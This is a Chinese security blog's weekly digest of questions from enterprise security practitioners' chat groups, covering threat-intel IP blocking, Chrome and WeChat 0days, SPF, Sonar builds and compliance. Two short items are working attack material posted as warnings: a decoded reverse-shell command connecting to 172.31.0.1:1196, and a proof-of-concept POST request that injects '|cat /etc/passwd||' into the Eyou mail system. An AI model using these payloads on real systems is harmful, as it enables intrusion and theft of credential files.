![群话题 | 关键词:IP封禁影响访问、Chrome 远程代码执行 0Day 、微信PC版0Day、提高安全在业务上的影响力……]( "群话题 | 关键词:IP封禁影响访问、Chrome 远程代码执行 0Day 、微信PC版0Day、提高安全在业务上的影响力……")
![群话题 | 关键词:IP封禁影响访问、Chrome 远程代码执行 0Day 、微信PC版0Day、提高安全在业务上的影响力……]( "群话题 | 关键词:IP封禁影响访问、Chrome 远程代码执行 0Day 、微信PC版0Day、提高安全在业务上的影响力……")
1、各位大佬,《中国人民银行科技司关于做好 庆祝中国共产党成立100周年网络安全保障工作的通知》这个大家有收到过吗?是真的还是钓鱼?
1、A公司办公网互联网出口IP被威胁情报标记异常,B公司采用该情报并封禁该IP对B公司的网络访问,影响了A公司访问B公司信息系统的业务。大家有遇到过这种情况吗,临时沟通协商解封的办法感觉只是扬汤止沸,有没有什么事前的长效机制规避?关于以上问题的讨论已经整理成了一篇公众号文章,链接如下:
https://mp.weixin.qq.com/s/SGWPKIgqGSky9zcJBxLTlQ
补充一个我们的实践:在封禁任何ip前统计相关ip承载的业务量,正常用户活动量。正常业务超过一定量,由人工处理,进行账号、UA或规则方面的精细封堵。封的是外部攻击IP。防止自己的业务IP被封除了自己努力外,需要行业内共识。实施封禁的一方要谨慎,要能尽量做好告知警示与协调。现在有些过激现象,不管不顾单方面封禁,给被封方挺大影响。防止自己一方被封大家说得挺多挺好,不赘述
2、《恶意加密流量检测 | 观成ENS有效检出三款热门黑客工具:冰蝎、哥斯拉、CobaltStrike》:
http://mp.weixin.qq.com/s?__biz=MzU2Mjg1NjY4Nw==&mid=2247483805&idx=1&sn=6db815724afbc831b65a2d1f61e3b2f1&chksm=fc62561dcb15df0b35fb632d5ea594ae9f93fdad8d3b73654ebbb2ef201542a5e2a829d57a3c&mpshare=1&scene=1&srcid=0413sg77SsLAZn3DAbvKbhdc&sharer_sharetime=1618278849039&sharer_shareid=294abbe3ba6c653b88fb713dc13ab4f7#rd
3、通用修补建议 目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版(89.0.4389.114)仍存在漏洞,请关注官方Chrome正式版更新,及时修补漏洞。
5、请教各位,SPF可以防止发件人伪造攻击,但是对没有设置SPF记录的域名无效,请问有其他方法可以100%识别发件人伪造攻击吗?
6、“微信使用chrome内核,多个用户被钓鱼,大家不要轻易点击微信链接!!!目前有攻击队掌握chrome 0day, 模式都是装成猎头或者HR, 微信里面给发一个网页链接 这个要求需要在微信里面, 因为微信的chrome组件是关闭沙箱的, 正常的chome浏览器有沙箱, 这个0day目前逃逸不了。”微信这个属实么?
7、[文件:Chrome 远程代码执行 0Day 漏洞安全风险通告(4.14).pdf] 这是一个新的漏洞?新的。昨天的那个chrome有更新修复了,然后,出了个新的。chrome又来一个远程代码执行 0day漏洞,还是no-sandbox启动,影响最新版本,漏洞利用已经放出来了。除了chrome本身,也要关注下这 V8漏洞带来的供应链安全,使用相同内核的软件可能都有问题。
8、有大佬使用了jenkins + sonar么,遇到个问题:java项目,使用findbug的规则。正常的mvn项目,都有一个src目录和pom.xml文件,编译后会生成target/classes,这种项目在Jenkins 构建之后使用sonar插件,配置
sonar.java.binaries=$WORKSPACE/target/classes/ sonar.sources=$WORKSPACE/src 是没有问题的。我们有很多项目结构都是 ├─project_1 │ ├─src │ └─pom.xml ├─project_2 │ ├─src │ └─pom.xml └─pom.xml
编译不会报错,已经编译通过了,sonar这步骤报错。
9、求教各位大佬,如果虚机上的业务已经停了服务,还能看到虚机上有上面的进程,但没有用户登入记录,是否异常?
10、微信PC版的0Day,哪位大佬有听说?也是chrome的洞,但不是最近这2个0day,最近这2个稳定利用不太容易,新版本微信已经出了,大家赶紧更新吧。Pc微信的引擎因为太老了,其实不受这两个漏洞影响.但是因为没有沙箱,会有别的漏洞影响.安卓微信也没有沙箱。
11、【TPSA-21-12】关于Chrome存在安全问题可能影响Windows版本微信的通告:
http://mp.weixin.qq.com/s?__biz=MjM5NzE1NjA0MQ==&mid=2651204165&idx=1&sn=9c555877a448a1a335ac27fbe8743b40&chksm=bd2ccfe38a5b46f56ee0ea222324f41ab89e8c8f4f5f82307ab1d78a15bc9861a4bd6ef03be1&mpshare=1&scene=1&srcid=0416Dg4brAq98BEdAKgY7jFf&sharer_sharetime=1618575600944&sharer_shareid=c5849537b6483b025d818404d4f0a3d0#rd
12、鹅厂自己改个内置浏览器。估计不好弄,现在连微软都用Chrome了。。。。现在市场上只剩下safari、chrome、ff、opera了吧。
13、“小鱼易连0day 发现时间:2021-04-18 14:53 特征发现:匹配规则base64编码 解码特征(存在反弹shell):mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect 172.31.0.1:1196 > /tmp/s;rm -f /tmp/s” 这个消息确凿吗?确凿。如果是针对服务端的还好,私有化部署的要小心。
1、请教一下金融类大佬,银行内部关于客户端应用软件、支付系统是如何划分的呢?查了一些金融类的文,但感觉理解还是不够清楚。
2、想来求个文:企业远程办公、远程访问和自带设备 (BYOD) 安全指南。
3、各位大佬,求一些关于各类金融监管机构对机房物理安全要求方面的资料,万分感谢。
4、个人信息保护法、数据安全法即将二审,哪里有这两个法的草案?
1、请教各位大佬,哪家防勒索病毒产品靠谱?试试火绒,还有Windows 自带的勒索软件防护功能你们测试过吗?
--------------------------------------------------------------------------------------------------
1、问下各位,公司准备把项目开源,安全有什么需要check的?看下有没有什么敏感信息就好了?
2、请教大家个问题,这两天报出来的chrome漏洞,有没有什么好办法,推动公司内部办公电脑们的浏览器来一波升级?
1、各位银行的老师们,关于开发、运维分离的问题,在生产环境中是需要严格遵守这个要求。在测试环境是否也需要这样,还是说测试环境可以交给开发自运维 (非root)?
2、大佬们,有时间讨论个问题吗?对于容器这部分,目前是基于啥方案来做入侵检测的呢?auditbeat完全采集不到相关信息啊
3、chrome 默认开启沙箱的,0day不是说要加 --no-sandbox 启动参数才可以利用吗,如果属实那就是微信内置浏览器启动带了这个参数
4、0day或1day预警:亿邮邮件系统存在远程命令执行漏洞 poc:POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 Host: xxx Content-Length: 25 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chro·me/89.0.4389.114 Safari/537.36 type='|cat /etc/passwd||'
5、关于账户混用的,大家都是怎么解决的?VPN登录为A,SSO登录为B账户
1、请问一下 NAC 支持mac的 哪家产品比较好?
2、请问大家 除了 http://www.dnslog.cn/ 还有哪些可以做dnslog查询的平台?只是想把这些域名加入黑名单而已,不是想自己搭建
3、全流量分析的,科来的跟天眼,谁对比过,感觉咋样?除了这两个,还有其他的么?
4、有没有推荐网络空间资产系统的介绍啊?可以做测绘、级联、漏洞等。
1、现在好多年轻的小伙,一年就搞一次HVV,赚一波,剩下就是自由支配时间,工作也不急着找。大家对这现象怎么看?
2、没被抽中的甲方是不是可以去抽中的甲方做支援,这样还锻炼能力。
要分情况,业务的影响力一般体现在文化、管理和技术的三个层面: 1、文化更多的是看软实力,在谈安全的时候,业务人员不是特别抵触就已经是非常大进步,长期的文化宣传是必不可少的,结合内部外都关注的事件(热点)来驱动是性价比最高的方式;2、管理上非常重要的指标是体现在安全决策权或者一票否决权(最好慎用),这主要体现在组织架构治理以及关键业务流程审批机制上安全的地位和作用;3、技术上更不用说,从业务、数据、应用以及IT基础设施架构各个层面,安全的覆盖率和支撑能力能到什么程度,这能明显的看的出来安全的影响力,安全和业务、技术是融合的,彼此不是制约,安全服务并保障业务。提升安全在业务的影响力的方式非常多,上面只是稍微挖了下坑,H@VV其实可以认为是以上三者的结合,很好的提高安全在业务上的影响力。
4、问下群里的大佬们,对于一个从事安全业务的后端研发(主要是安全运营产品,SDL等) ,考CISP的必要性高不?因为是研发出身,之前在工作中遇到的比较碎片,没有对安全形成体系化的认识。
---------------------------------------------------------------------------------------------------------------
【金融业企业安全建设实践群】和【企业安全建设实践群】每周讨论的话题会同步在本公众号推送(每周五晚)。根据话题整理的群周报完整版——每个话题甲方朋友们的展开讨论内容——每周会上传知识星球,方便大家查阅。
群话题 | 关键词:安全人员的最佳发展路径、网安属于武林or江湖、各单位对待大型演练的态度、webshell多发、弱口令……
原文始发于微信公众号(君哥的体历):群话题 | 关键词:IP封禁影响访问、Chrome 远程代码执行 0Day 、微信PC版0Day、提高安全在业务上的影响力……
评论